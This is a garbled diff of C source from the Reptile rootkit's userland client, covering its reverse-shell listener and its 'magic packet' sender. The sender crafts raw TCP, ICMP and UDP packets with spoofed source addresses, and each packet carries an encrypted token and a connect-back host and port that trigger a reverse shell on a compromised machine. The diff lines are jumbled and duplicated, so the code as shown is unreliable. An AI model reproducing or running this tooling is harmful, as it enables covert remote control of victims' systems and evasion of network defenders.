 	signal(SIGINT, handle_shutdown);
 	// 定义主机地址结构体
 	host_addr.sin_family = AF_INET;
 	host_addr.sin_port = htons(port);
 	host_addr.sin_addr.s_addr = INADDR_ANY;
 	memset(&(host_addr.sin_zero), '\0', 8);
-	// 绑定套接字到主机地址
+	if (bind(sockfd, (struct sockaddr *)&host_addr,
-	if (bind(sockfd, (struct sockaddr*)&host_addr, sizeof(struct sockaddr)) == -1) {
+		 sizeof(struct sockaddr)) == -1) {
 		kill(pid, SIGQUIT);
 		close(sockfd);
 		fatal("binding to socket");
 	}
 	// 监听套接字
 	if (listen(sockfd, 5) == -1) {
 		kill(pid, SIGQUIT);
 		close(sockfd);
 		fatal("listening on socket");
-	}
+	} else {
 	else {
 		fprintf(stdout, "%s Listening on port %d...\n", good, port);
 	}
 	// 接受客户端连接
 	sin_size = sizeof(struct sockaddr_in);
-	new_sockfd = accept(sockfd, (struct sockaddr*)&client_addr, &sin_size);
+	new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
 	if (new_sockfd == -1) {
 		kill(pid, SIGQUIT);
 		close(sockfd);
 		fatal("accepting connection");
 	}
 	// 打印客户端连接信息
 	fprintf(stdout, "%s Connection from %s:%d\n\n", awesome,
 		inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port));
-	// 如果没有设置密码，提示用户输入密码
+	// usleep(100 * 1500);
 	if (password == NULL) {
 		password = getpass("Password: ");
 		fprintf(stdout, "\n");
 	}
 	// 初始化客户端连接
 	if (pel_client_init(new_sockfd, password) != PEL_SUCCESS) {
 		close(new_sockfd);
 		fprintf(stdout, "%s wrong password!\n\n", bad);
 		exit(ERROR);
 	}
 	// 打印欢迎信息并进入命令行循环
 	banner();
 	reptile_loop(new_sockfd);
 	// 关闭套接字
 	shutdown(new_sockfd, SHUT_RDWR);
 	close(sockfd);
 }
-// 显示使用方法的函数
+void usage(char *argv0)
-void usage(char* argv0) {
+{
-	fprintf(stderr, "Usage: %s [ -p port ] [ -s secret ]\n", argv0);
+	fprintf(stderr, "Usage: %s [ -p port ] [ -s secret ]\n",
 		argv0);
 	exit(1);
 }
-// 主函数
+int main(int argc, char **argv)
-int main(int argc, char** argv) {
+{
 	int opt, port = 0;
 	// 解析命令行参数
 	while ((opt = getopt(argc, argv, "p:s:")) != EOF) {
 		switch (opt) {
 		case 'p':
@ -745,28 +781,28 @@ int main(int argc, char** argv) {
 		}
 	}
 	// 如果没有提供端口号，则显示使用方法并退出
 	if (port == 0)
 		usage(*argv);
 	// 如果命令行参数不足，则显示使用方法并退出
 	if (argc <= 1)
 		usage(argv[0]);
-	// 打印使用密码信息
+	// printf("\n\e[01;36mReptile Shell\e[00m\n");
 	// printf("\e[01;32mWritten by: F0rb1dd3n\e[00m\n\n");
 	if (password != NULL)
 		fprintf(stdout, "%s Using password: %s\n", good, password);
 	// 创建子进程
 	pid = fork();
 	if (pid == -1)
 		fatal("on forking proccess");
 	// 父进程调用listener函数监听连接
 	if (pid > 0)
 		listener(port);
-	// 子进程执行后台任务（这部分代码被注释掉了）
+	// if (pid == 0)
 	// background job while we are listening
 	return EXIT_SUCCESS;
 }
--- a/src/Reptile/userland/client/packet.c
+++ b/src/Reptile/userland/client/packet.c
@ -21,457 +21,444 @@
 #include "util.h"
 // Don't worry, it is gonna cahnged next version
-// 定义常量，这些值用于设置IP首部和TCP首部的字段
+#define KEY 0x6de56d3b
-#define KEY 0x6de56d3b // 加密密钥
+#define IPID 3429
-#define IPID 3429 // IP标识符
+#define SEQ 15123
-#define SEQ 15123 // TCP序列号
+#define WIN 9965
-#define WIN 9965 // TCP窗口大小
+
-
+struct pseudohdr
-// 定义一个伪首部结构体，用于计算TCP和UDP数据包的校验和
+{
-struct pseudohdr {
+	uint32_t saddr;
-    uint32_t saddr; // 源IP地址
+	uint32_t daddr;
-    uint32_t daddr; // 目的IP地址
+	uint8_t zero;
-    uint8_t zero;   // 填充字段，总是0
+	uint8_t protocol;
-    uint8_t protocol; // 协议类型，TCP或UDP
+	uint16_t length;
    uint16_t length; // 长度，TCP或UDP首部和数据的总长度
 };
-// 计算校验和的函数，用于IP和TCP/UDP首部
+unsigned short csum(unsigned short *buf, int nwords)
-unsigned short csum(unsigned short* buf, int nwords) {
+{
-    unsigned long sum;
+	unsigned long sum;
-    unsigned short odd;
+	unsigned short odd;
-    // 将两个字节的校验和相加
+	for (sum = 0; nwords > 1; nwords-=2)
-    for (sum = 0; nwords > 1; nwords -= 2)
+		sum += *buf++;
        sum += *buf++;
-    // 如果有奇数个字节，将最后一个字节加入校验和
+	if (nwords == 1) {
-    if (nwords == 1) {
+		odd = 0;
-        odd = 0;
+		*((unsigned char *)&odd) = *(unsigned char *)buf;
-        *((unsigned char*)&odd) = *(unsigned char*)buf;
+		sum += odd;
-        sum += odd;
+	}
    }
-    // 将校验和折叠成16位
+	sum = (sum >> 16) + (sum & 0xffff);
-    sum = (sum >> 16) + (sum & 0xffff);
+	sum += (sum >> 16);
    sum += (sum >> 16);
-    // 返回反码
+	return ~sum;
    return ~sum;
 }
-// 发送TCP数据包的函数
+int tcp(char *srcip, char *dstip, unsigned int srcport, unsigned int dstport, char *data, unsigned int data_len)
-int tcp(char* srcip, char* dstip, unsigned int srcport, unsigned int dstport, char* data, unsigned int data_len) {
+{
-    // 变量声明
+	int socktcp, nbytes, ret = EXIT_FAILURE;
-    int socktcp, nbytes, ret = EXIT_FAILURE;
+	unsigned int pckt_tam, plen;
-    unsigned int pckt_tam, plen;
+	char *buffer;
-    char* buffer;
+	struct iphdr *iph;
-    struct iphdr* iph;
+	struct tcphdr *tcph;
-    struct tcphdr* tcph;
+	struct sockaddr_in s;
-    struct sockaddr_in s;
+	socklen_t optval = 1;
-    socklen_t optval = 1;
+	struct pseudohdr psh;
-    struct pseudohdr psh;
+	char *pseudo_packet;
-    char* pseudo_packet;
+
-
+	pckt_tam = sizeof(struct iphdr) + sizeof(struct tcphdr) + data_len;
-    // 计算数据包总长度
+
-    pckt_tam = sizeof(struct iphdr) + sizeof(struct tcphdr) + data_len;
+	if (!(buffer = (char *)malloc(pckt_tam))) {
-
+		fatal("on allocating buffer memory");
-    // 分配内存
+		return ret;
-    if (!(buffer = (char*)malloc(pckt_tam))) {
+	}
-        fatal("on allocating buffer memory");
+
-        return ret;
+	memset(buffer, '\0', pckt_tam);
-    }
+
-
+	iph = (struct iphdr *)buffer;
-    // 初始化内存
+	tcph = (struct tcphdr *)(buffer + sizeof(struct iphdr));
-    memset(buffer, '\0', pckt_tam);
+
-
+	if ((socktcp = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) == -1) {
-    // 填充IP首部
+		fatal("on creating TCP socket");
-    iph = (struct iphdr*)buffer;
+		goto free_buffer;
-    tcph = (struct tcphdr*)(buffer + sizeof(struct iphdr));
+	}
-    iph->ihl = 5;
+
-    iph->version = 4;
+	if (setsockopt(socktcp, IPPROTO_IP, IP_HDRINCL, &optval, sizeof(optval)) == -1) {
-    iph->tos = 0;
+		fatal("on setsockopt");
-    iph->id = htons(IPID);
+		goto close_socket;
-    iph->ttl = 255;
+	}
-    iph->protocol = IPPROTO_TCP;
+
-    iph->tot_len = pckt_tam;
+	memcpy((buffer + sizeof(struct iphdr) + sizeof(struct tcphdr)), data, data_len);
-    iph->saddr = inet_addr(srcip);
+
-    iph->daddr = inet_addr(dstip);
+	iph->ihl = 5;
-    iph->check = csum((unsigned short*)buffer, iph->tot_len);
+	iph->version = 4;
-
+	iph->tos = 0;
-    // 填充TCP首部
+	iph->id = htons(IPID);
-    tcph->source = htons(srcport);
+	iph->ttl = 255;
-    tcph->dest = htons(dstport);
+	iph->protocol = IPPROTO_TCP;
-    tcph->seq = 0x0;
+	iph->tot_len = pckt_tam;
-    tcph->ack_seq = 0;
+	iph->saddr = inet_addr(srcip);
-    tcph->doff = 5;
+	iph->daddr = inet_addr(dstip);
-    tcph->fin = 0;
+
-    tcph->syn = 1;
+	//iph->check = csum((unsigned short *)buffer, sizeof(struct iphdr) + sizeof(struct tcphdr));
-    tcph->rst = 0;
+	iph->check = csum((unsigned short *)buffer, iph->tot_len);
-    tcph->psh = 0;
+
-    tcph->ack = 0;
+	tcph->source = htons(srcport);
-    tcph->urg = 0;
+	tcph->dest = htons(dstport);
-    tcph->window = htons(WIN);
+	tcph->seq = 0x0;
-    tcph->urg_ptr = 0;
+	tcph->ack_seq = 0;
-    tcph->check = 0;
+	tcph->doff = 5;
-
+	tcph->fin = 0;
-    // 构建伪首部，用于计算TCP校验和
+	tcph->syn = 1;
-    psh.saddr = inet_addr(srcip);
+	tcph->rst = 0;
-    psh.daddr = inet_addr(dstip);
+	tcph->psh = 0;
-    psh.zero = 0;
+	tcph->ack = 0;
-    psh.protocol = IPPROTO_TCP;
+	tcph->urg = 0;
-    psh.length = htons(sizeof(struct tcphdr) + data_len);
+	tcph->window = htons(WIN);
-
+	tcph->urg_ptr = 0;
-    // 计算TCP首部和数据的校验和
+	tcph->check = 0;
-    plen = sizeof(struct pseudohdr) + sizeof(struct tcphdr) + data_len;
+
-    if ((pseudo_packet = malloc(plen)) == NULL) {
+	psh.saddr = inet_addr(srcip);
-        fatal("on malloc");
+	psh.daddr = inet_addr(dstip);
-        goto close_socket;
+	psh.zero = 0;
-    }
+	psh.protocol = IPPROTO_TCP;
-    bzero(pseudo_packet, plen);
+	psh.length = htons(sizeof(struct tcphdr) + data_len);
-    memcpy(pseudo_packet, &psh, sizeof(struct pseudohdr));
+
-    tcph->seq = htons(SEQ);
+	plen = sizeof(struct pseudohdr) + sizeof(struct tcphdr) + data_len;
-    tcph->check = 0;
+
-    memcpy(pseudo_packet + sizeof(struct pseudohdr), tcph, sizeof(struct tcphdr) + data_len);
+	if ((pseudo_packet = malloc(plen)) == NULL) {
-    tcph->check = csum((unsigned short*)pseudo_packet, plen);
+		fatal("on malloc");
-
+		goto close_socket;
-    // 设置目的地址和端口
+	}
-    s.sin_family = AF_INET;
+
-    s.sin_port = htons(dstport);
+	bzero(pseudo_packet, plen);
-    s.sin_addr.s_addr = inet_addr(dstip);
+	memcpy(pseudo_packet, &psh, sizeof(struct pseudohdr));
-
+
-    // 发送数据包
+	tcph->seq = htons(SEQ);
-    if ((nbytes = sendto(socktcp, buffer, iph->tot_len, 0, (struct sockaddr*)&s, sizeof(struct sockaddr))) == -1)
+	tcph->check = 0;
-        fatal("on sending package");
+	memcpy(pseudo_packet + sizeof(struct pseudohdr), tcph, sizeof(struct tcphdr) + data_len);
-
+	tcph->check = csum((unsigned short *)pseudo_packet, plen);
-    // 清理资源
+
-    if (nbytes > 0) {
+	s.sin_family = AF_INET;
-        fprintf(stdout, "%s TCP: %u bytes was sent!\n", good, nbytes);
+	s.sin_port = htons(dstport);
-        ret = EXIT_SUCCESS;
+	s.sin_addr.s_addr = inet_addr(dstip);
-    }
+
-
+	if ((nbytes = sendto(socktcp, buffer, iph->tot_len, 0, (struct sockaddr *)&s, sizeof(struct sockaddr))) == -1)
-    free(pseudo_packet);
+		fatal("on sending package");
 	if (nbytes > 0) {
 		fprintf(stdout, "%s TCP: %u bytes was sent!\n", good, nbytes);
 		ret = EXIT_SUCCESS;
 	}
 	free(pseudo_packet);
 close_socket:
-    close(socktcp);
+	close(socktcp);
 free_buffer:
-    free(buffer);
+	free(buffer);
-    return ret;
+	return ret;
 }
-// 发送ICMP数据包的函数
+int icmp(char *srcip, char *dstip, char *data, unsigned int data_len)
-int icmp(char* srcip, char* dstip, char* data, unsigned int data_len) {
+{
-    // 变量声明
+	int sockicmp, nbytes, ret = EXIT_FAILURE;
-    int sockicmp, nbytes, ret = EXIT_FAILURE;
+	unsigned int pckt_tam;
-    unsigned int pckt_tam;
+	char *buffer;
-    char* buffer;
+	struct iphdr *iph;
-    struct iphdr* iph;
+	struct icmphdr *icmp;
-    struct icmphdr* icmp;
+	struct sockaddr_in s;
-    struct sockaddr_in s;
+	socklen_t optval = 1;
-    socklen_t optval = 1;
+
-
+	pckt_tam = (sizeof(struct iphdr) + sizeof(struct icmphdr) + data_len);
-    // 计算数据包总长度
+
-    pckt_tam = sizeof(struct iphdr) + sizeof(struct icmphdr) + data_len;
+	if (!(buffer = (char *)malloc(pckt_tam))) {
-
+		fatal("on allocating buffer memory");
-    // 分配内存
+		return ret;
-    if (!(buffer = (char*)malloc(pckt_tam))) {
+	}
-        fatal("on allocating buffer memory");
+
-        return ret;
+	memset(buffer, '\0', pckt_tam);
-    }
+
-
+	iph = (struct iphdr *)buffer;
-    // 初始化内存
+	icmp = (struct icmphdr *)(buffer + sizeof(struct iphdr));
-    memset(buffer, '\0', pckt_tam);
+
-
+	if ((sockicmp = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) {
-    // 填充IP首部
+		fatal("in creating raw ICMP socket");
-    iph = (struct iphdr*)buffer;
+		goto free_buffer;
-    icmp = (struct icmphdr*)(buffer + sizeof(struct iphdr));
+	}
-    iph->ihl = 5;
+
-    iph->version = 4;
+	if (setsockopt(sockicmp, IPPROTO_IP, IP_HDRINCL, &optval, sizeof(optval)) == -1) {
-    iph->tos = 0;
+		fatal("in setsockopt");
-    iph->id = htons(IPID);
+		goto close_socket;
-    iph->ttl = 255;
+	}
-    iph->protocol = IPPROTO_ICMP;
+
-    iph->saddr = inet_addr(srcip);
+	memcpy((buffer + sizeof(struct iphdr) + sizeof(struct icmphdr)), data, data_len);
-    iph->daddr = inet_addr(dstip);
+
-    iph->tot_len = pckt_tam;
+	iph->ihl = 5;
-    iph->check = csum((unsigned short*)buffer, iph->tot_len);
+	iph->version = 4;
-
+	iph->tos = 0;
-    // 填充ICMP首部
+	iph->id = htons(IPID);
-    icmp->type = 8; // ICMP类型：回显请求
+	iph->ttl = 255;
-    icmp->code = ICMP_ECHO; // ICMP代码：回显请求
+	iph->protocol = IPPROTO_ICMP;
-    icmp->checksum = 0; // 清零校验和字段
+	iph->saddr = inet_addr(srcip);
-    icmp->un.echo.id = htons(WIN); // ICMP标识符
+	iph->daddr = inet_addr(dstip);
-    icmp->un.echo.sequence = htons(SEQ); // ICMP序列号
+	iph->tot_len = pckt_tam;
-
+	iph->check = csum((unsigned short *)buffer, iph->tot_len);
-    // 计算ICMP首部和数据的校验和
+
-    icmp->checksum = csum((unsigned short*)icmp, sizeof(struct icmphdr) + data_len);
+	icmp->type = 8;
-
+	icmp->code = ICMP_ECHO;
-    // 设置目的地址
+	icmp->checksum = 0;
-    s.sin_family = AF_INET;
+	icmp->un.echo.id = htons(WIN);
-    s.sin_addr.s_addr = inet_addr(dstip);
+	icmp->un.echo.sequence = htons(SEQ);
-
+
-    // 发送数据包
+	icmp->checksum = csum((unsigned short *)icmp, sizeof(struct icmphdr) + data_len);
-    if ((nbytes = sendto(sockicmp, buffer, iph->tot_len, 0, (struct sockaddr*)&s, sizeof(struct sockaddr))) == -1)
+
-        fatal("on sending package");
+	s.sin_family = AF_INET;
-
+	s.sin_addr.s_addr = inet_addr(dstip);
-    // 清理资源
+
-    if (nbytes > 0) {
+	if ((nbytes = sendto(sockicmp, buffer, iph->tot_len, 0, (struct sockaddr *)&s, sizeof(struct sockaddr))) == -1)
-        fprintf(stdout, "%s ICMP: %u bytes was sent!\n", good, nbytes);
+		fatal("on sending package");
-        ret = EXIT_SUCCESS;
+
-    }
+	if (nbytes > 0) {
-
+		fprintf(stdout, "%s ICMP: %u bytes was sent!\n", good, nbytes);
 		ret = EXIT_SUCCESS;
 	}
 close_socket:
-    close(sockicmp);
+	close(sockicmp);
 free_buffer:
-    free(buffer);
+	free(buffer);
-    return ret;
+	return ret;
 }
-// 发送UDP数据包的函数
+int udp(char *srcip, char *dstip, unsigned int srcport, unsigned int dstport, char *data, unsigned int data_len)
-int udp(char* srcip, char* dstip, unsigned int srcport, unsigned int dstport, char* data, unsigned int data_len) {
+{
-    // 声明变量
+	int sockudp, nbytes, ret = EXIT_FAILURE;
-    int sockudp, nbytes, ret = EXIT_FAILURE; // 用于网络通信的socket，发送的字节数，返回值
+	unsigned int pckt_tam, plen;
-    unsigned int pckt_tam, plen; // 数据包长度，伪包长度
+	char *buffer;
-    char* buffer; // 缓冲区
+	struct iphdr *iph;
-    struct iphdr* iph; // IP头指针
+	struct udphdr *udph;
-    struct udphdr* udph; // UDP头指针
+	struct sockaddr_in s;
-    struct sockaddr_in s; // 地址结构
+	socklen_t optval = 1;
-    socklen_t optval = 1; // 设置socket选项的值
+	struct pseudohdr psh;
-    struct pseudohdr psh; // 伪包头结构
+	char *pseudo_packet;
-    char* pseudo_packet; // 伪包数据指针
+
-
+	pckt_tam = sizeof(struct iphdr) + sizeof(struct udphdr) + data_len;
-    // 计算数据包总长度
+
-    pckt_tam = sizeof(struct iphdr) + sizeof(struct udphdr) + data_len;
+	if (!(buffer = (char *)malloc(pckt_tam))) {
-
+		fatal("on allocating buffer memory");
-    // 分配内存
+		return ret;
-    if (!(buffer = (char*)malloc(pckt_tam))) {
+	}
-        fatal("on allocating buffer memory"); // 分配失败时调用fatal函数
+
-        return ret; // 返回失败
+	memset(buffer, '\0', pckt_tam);
-    }
+
-
+	iph = (struct iphdr *)buffer;
-    // 初始化内存
+	udph = (struct udphdr *)(buffer + sizeof(struct iphdr));
-    memset(buffer, '\0', pckt_tam); // 将缓冲区清零
+
-
+	if ((sockudp = socket(PF_INET, SOCK_RAW, IPPROTO_UDP)) == -1) {
-    // 填充IP首部
+		fatal("on creating UDP socket");
-    iph = (struct iphdr*)buffer; // 将缓冲区的开始部分视为IP头
+		goto free_buffer;
-    udph = (struct udphdr*)(buffer + sizeof(struct iphdr)); // IP头后是UDP头
+	}
-    iph->ihl = 5; // IP头长度
+
-    iph->version = 4; // IP版本
+	if (setsockopt(sockudp, IPPROTO_IP, IP_HDRINCL, &optval, sizeof(optval)) == -1) {
-    iph->tos = 0; // 服务类型
+		fatal("on setsockopt");
-    iph->id = htons(IPID); // 标识符
+		goto close_socket;
-    iph->ttl = 255; // 生命周期
+	}
-    iph->protocol = IPPROTO_UDP; // 协议类型
+
-    iph->tot_len = pckt_tam; // 总长度
+	memcpy((buffer + sizeof(struct iphdr) + sizeof(struct udphdr)), data, data_len);
-    iph->saddr = inet_addr(srcip); // 源IP地址
+
-    iph->daddr = inet_addr(dstip); // 目的IP地址
+	iph->ihl = 5;
-    iph->check = csum((unsigned short*)buffer, iph->tot_len); // 校验和
+	iph->version = 4;
-
+	iph->tos = 0;
-    // 填充UDP首部
+	iph->id = htons(IPID);
-    udph->source = htons(srcport); // 源端口
+	iph->ttl = 255;
-    udph->dest = htons(dstport); // 目的端口
+	iph->protocol = IPPROTO_UDP;
-    udph->len = htons(sizeof(struct udphdr) + data_len); // UDP长度
+	iph->tot_len = pckt_tam;
-    udph->check = 0; // 校验和初始化为0
+	iph->saddr = inet_addr(srcip);
-
+	iph->daddr = inet_addr(dstip);
-    // 创建伪包头
+	iph->check = csum((unsigned short *)buffer, iph->tot_len);
-    psh.saddr = inet_addr(srcip); // 源IP地址
+
-    psh.daddr = inet_addr(dstip); // 目的IP地址
+	udph->source = htons(srcport);
-    psh.zero = 0; // 填充0
+	udph->dest = htons(dstport);
-    psh.protocol = IPPROTO_UDP; // 协议类型
+	udph->len = htons(sizeof(struct udphdr) + data_len);
-    psh.length = htons(sizeof(struct udphdr) + data_len); // UDP长度
+	udph->check = 0;
-
+	
-    // 计算伪包长度
+	psh.saddr = inet_addr(srcip);
-    plen = sizeof(struct pseudohdr) + sizeof(struct udphdr) + data_len;
+	psh.daddr = inet_addr(dstip);
-
+	psh.zero = 0;
-    // 分配伪包内存
+	psh.protocol = IPPROTO_UDP;
-    if ((pseudo_packet = malloc(plen)) == NULL) {
+	psh.length = htons(sizeof(struct udphdr) + data_len);
-        fatal("on malloc"); // 分配失败时调用fatal函数
+
-        goto close_socket; // 跳转到关闭socket的标签
+	plen = sizeof(struct pseudohdr) + sizeof(struct udphdr) + data_len;
-    }
+
-
+	if ((pseudo_packet = malloc(plen)) == NULL) {
-    // 初始化伪包内存
+		fatal("on malloc");
-    bzero(pseudo_packet, plen); // 清零伪包
+		goto close_socket;
-    memcpy(pseudo_packet, &psh, sizeof(struct pseudohdr)); // 复制伪包头
+	}
-
+
-    // 计算UDP校验和
+	bzero(pseudo_packet, plen);
-    udph->check = 0; // 校验和重置为0
+	memcpy(pseudo_packet, &psh, sizeof(struct pseudohdr));
-    memcpy(pseudo_packet + sizeof(struct pseudohdr), udph, sizeof(struct udphdr) + data_len); // 复制UDP头和数据
+
-    udph->check = csum((unsigned short*)pseudo_packet, plen); // 计算校验和
+	udph->check = 0;
-
+	memcpy(pseudo_packet + sizeof(struct pseudohdr), udph, sizeof(struct udphdr) + data_len);
-    // 设置目的地址
+	udph->check = csum((unsigned short *)pseudo_packet, plen);
-    s.sin_family = AF_INET; // 地址族
+
-    s.sin_port = htons(dstport); // 目的端口
+	//fprintf(stdout, "UDP Checksum = 0x%x\n", htons(udph->check));
-    s.sin_addr.s_addr = inet_addr(dstip); // 目的IP地址
+
-
+	s.sin_family = AF_INET;
-    // 发送数据包
+	s.sin_port = htons(dstport);
-    if ((nbytes = sendto(sockudp, buffer, iph->tot_len, 0, (struct sockaddr*)&s, sizeof(struct sockaddr))) == -1)
+	s.sin_addr.s_addr = inet_addr(dstip);
-        fatal("on sending package"); // 发送失败时调用fatal函数
+
-
+	if ((nbytes = sendto(sockudp, buffer, iph->tot_len, 0, (struct sockaddr *)&s, sizeof(struct sockaddr))) == -1)
-    // 检查发送的字节数
+		fatal("on sending package");
-    if (nbytes > 0) {
+	
-        fprintf(stdout, "%s UDP: %u bytes was sent!\n", good, nbytes); // 打印成功消息
+	if (nbytes > 0) {
-        ret = EXIT_SUCCESS; // 设置返回值为成功
+		fprintf(stdout, "%s UDP: %u bytes was sent!\n", good, nbytes);
-    }
+		ret = EXIT_SUCCESS;
-
+	}
-    // 释放伪包内存
+
-    free(pseudo_packet);
+	free(pseudo_packet);
 close_socket:
-    // 关闭socket
+	close(sockudp);
    close(sockudp);
 free_buffer:
-    // 释放缓冲区内存
+	free(buffer);
-    free(buffer);
+	return ret;
    return ret; // 返回结果
 }
-void usage(char* argv0)
+void usage(char *argv0)
 {
-    // 打印使用说明
+	fprintf(stderr, "\n\e[01;32mReptile Packet Sender\e[00m\n");
-    fprintf(stderr, "\n\e[01;32mReptile Packet Sender\e[00m\n");
+	fprintf(stderr, "\e[01;31mWritten by F0rb1dd3n\e[00m\n");
-    fprintf(stderr, "\e[01;31mWritten by F0rb1dd3n\e[00m\n");
+	fprintf(stderr, "\nUsage: %s [options]\n\n", argv0);
-    fprintf(stderr, "\nUsage: %s [options]\n\n", argv0);
+	fprintf(stderr, "-t\tTarget\n");
-    fprintf(stderr, "-t\tTarget\n");
+	fprintf(stderr, "-r\tRemote port from magic packets (only for tcp/udp)\n");
-    fprintf(stderr, "-r\tRemote port from magic packets (only for tcp/udp)\n");
+	fprintf(stderr, "-x\tMagic Packet protocol (tcp/icmp/udp)\n");
-    fprintf(stderr, "-x\tMagic Packet protocol (tcp/icmp/udp)\n");
+	fprintf(stderr, "-s\tSource IP address to spoof\n");
-    fprintf(stderr, "-s\tSource IP address to spoof\n");
+	fprintf(stderr, "-q\tSource port from magic packets (only for tcp/udp)\n");
-    fprintf(stderr, "-q\tSource port from magic packets (only for tcp/udp)\n");
+	fprintf(stderr, "-l\tHost to receive the reverse shell\n");
-    fprintf(stderr, "-l\tHost to receive the reverse shell\n");
+	fprintf(stderr, "-p\tHost port to receive the reverse shell\n");
-    fprintf(stderr, "-p\tHost port to receive the reverse shell\n");
+	fprintf(stderr, "-k\tToken to trigger the port-knocking\n\n");
-    fprintf(stderr, "-k\tToken to trigger the port-knocking\n");
+	exit(1);
    exit(1); // 退出程序
 }
-int main(int argc, char** argv)
+int main(int argc, char **argv)
 {
-    // 声明变量
+	int opt, dstport, srcport, len, crypt_len;
-    int opt, dstport, srcport, len, crypt_len;
+	char *prot, *dstip, *srcip, *connect_back_host, *connect_back_port,
-    char* prot, * dstip, * srcip, * connect_back_host, * connect_back_port,
+	    *token, *data;
-        * token, * data;
+
-
+	dstport = srcport = 0;
-    // 初始化端口变量
+
-    dstport = srcport = 0;
+	prot = dstip = srcip = connect_back_host = connect_back_port = token =
-
+	    NULL;
-    // 初始化字符串指针
+
-    prot = dstip = srcip = connect_back_host = connect_back_port = token =
+	while ((opt = getopt(argc, argv, "x:t:l:p:r:s:q:k:")) != EOF) {
-        NULL;
+		switch (opt) {
-
+		case 'x':
-    // 解析命令行参数
+			prot = optarg;
-    while ((opt = getopt(argc, argv, "x:t:l:p:r:s:q:k:")) != EOF) {
+			if (strcmp(prot, "icmp") == 0 ||
-        switch (opt) {
+			    strcmp(prot, "ICMP") == 0) {
-        case 'x':
+				if (strcmp(prot, "udp") == 0 ||
-            // 设置协议
+				    strcmp(prot, "UDP") == 0) {
-            prot = optarg;
+					if (strcmp(prot, "tcp") == 0 ||
-            // 检查协议是否合法
+					    strcmp(prot, "TCP") == 0) {
-            if (strcmp(prot, "icmp") == 0 || strcmp(prot, "ICMP") == 0) {
+						printf("%s wrong "
-                if (strcmp(prot, "udp") == 0 || strcmp(prot, "UDP") == 0) {
+						       "protocol\n",
-                    if (strcmp(prot, "tcp") == 0 || strcmp(prot, "TCP") == 0) {
+						       bad);
-                        printf("%s wrong protocol\n", bad);
+						exit(-1);
-                        exit(-1);
+					}
-                    }
+				}
-                }
+			}
-            }
+			break;
-            break;
+		case 't':
-        case 't':
+			if (strlen(optarg) > 15) {
-            // 设置目标IP
+				printf("%s wrong IP address\n", bad);
-            if (strlen(optarg) > 15) {
+				exit(-1);
-                printf("%s wrong IP address\n", bad);
+			}
-                exit(-1);
+			dstip = optarg;
-            }
+			break;
-            dstip = optarg;
+		case 'l':
-            break;
+			if (strlen(optarg) > 15) {
-        case 'l':
+				printf("%s wrong IP address\n", bad);
-            // 设置连接回显IP
+				exit(-1);
-            if (strlen(optarg) > 15) {
+			}
-                printf("%s wrong IP address\n", bad);
+			connect_back_host = optarg;
-                exit(-1);
+			break;
-            }
+		case 'p':
-            connect_back_host = optarg;
+			if (atoi(optarg) < 0 || atoi(optarg) > 65535) {
-            break;
+				printf("%s wrong port\n", bad);
-        case 'p':
+				exit(-1);
-            // 设置连接回显端口
+			}
-            if (atoi(optarg) < 0 || atoi(optarg) > 65535) {
+			connect_back_port = optarg;
-                printf("%s wrong port\n", bad);
+			break;
-                exit(-1);
+		case 'r':
-            }
+			if (atoi(optarg) < 0 || atoi(optarg) > 65535) {
-            connect_back_port = optarg;
+				printf("%s wrong port\n", bad);
-            break;
+				exit(-1);
-        case 'r':
+			}
-            // 设置远程端口
+			dstport = atoi(optarg);
-            if (atoi(optarg) < 0 || atoi(optarg) > 65535) {
+			break;
-                printf("%s wrong port\n", bad);
+		case 's':
-                exit(-1);
+			if (strlen(optarg) > 15) {
-            }
+				printf("%s wrong IP address\n", bad);
-            dstport = atoi(optarg);
+				exit(-1);
-            break;
+			}
-        case 's':
+			srcip = optarg;
-            // 设置源IP
+			break;
-            if (strlen(optarg) > 15) {
+		case 'q':
-                printf("%s wrong IP address\n", bad);
+			if (atoi(optarg) < 0 || atoi(optarg) > 65535) {
-                exit(-1);
+				printf("%s wrong port\n", bad);
-            }
+				exit(-1);
-            srcip = optarg;
+			}
-            break;
+			srcport = atoi(optarg);
-        case 'q':
+			break;
-            // 设置源端口
+		case 'k':
-            if (atoi(optarg) < 0 || atoi(optarg) > 65535) {
+			if (strlen(optarg) > 16 || strlen(optarg) < 5) {
-                printf("%s wrong port\n", bad);
+				printf("%s wrong size of token\n", bad);
-                exit(-1);
+				exit(-1);
-            }
+			}
-            srcport = atoi(optarg);
+			token = optarg;
-            break;
+			break;
-        case 'k':
+		default:
-            // 设置令牌
+			usage(argv[0]);
-            if (strlen(optarg) > 16 || strlen(optarg) < 5) {
+			break;
-                printf("%s wrong size of token\n", bad);
+		}
-                exit(-1);
+	}
-            }
+
-            token = optarg;
+	if (prot == NULL || dstip == NULL || srcip == NULL ||
-            break;
+	    connect_back_host == NULL || connect_back_port == NULL ||
-        default:
+	    token == NULL) {
-            // 打印使用说明
+		usage(argv[0]);
-            usage(argv[0]);
+	}
-            break;
+
-        }
+	if (strcmp(prot, "tcp") == 0 || strcmp(prot, "udp") == 0 ||
-    }
+	    strcmp(prot, "TCP") == 0 || strcmp(prot, "UDP") == 0) {
-
+		if (srcport == 0 || dstport == 0)
-    // 检查必要的参数是否已设置
+			usage(argv[0]);
-    if (prot == NULL || dstip == NULL || srcip == NULL ||
+	}
-        connect_back_host == NULL || connect_back_port == NULL ||
+
-        token == NULL) {
+		
-        usage(argv[0]);
+	len = strlen(token) + strlen(connect_back_host) + strlen(connect_back_port) + 3;
-    }
+	crypt_len = strlen(connect_back_host) + strlen(connect_back_port) + 2;
-
+	data = (char *)malloc(len);
-    // 检查端口参数
+
-    if (strcmp(prot, "tcp") == 0 || strcmp(prot, "udp") == 0 ||
+	if (!data)
-        strcmp(prot, "TCP") == 0 || strcmp(prot, "UDP") == 0) {
+		fatal("malloc");
-        if (srcport == 0 || dstport == 0)
+
-            usage(argv[0]);
+	bzero(data, len);
-    }
+	snprintf(data, len, "%s %s %s", token, connect_back_host, connect_back_port);
-
+	do_encrypt(data + strlen(token) + 1, crypt_len, KEY);
-    // 计算数据长度
+
-    len = strlen(token) + strlen(connect_back_host) + strlen(connect_back_port) + 3;
+	// printf("data size: %d\n", len);
-    crypt_len = strlen(connect_back_host) + strlen(connect_back_port) + 2;
+
-    data = (char*)malloc(len);
+	if (strcmp(prot, "tcp") == 0 || strcmp(prot, "TCP") == 0) {
-
+		tcp(srcip, dstip, srcport, dstport, data, len);
-    // 检查内存分配
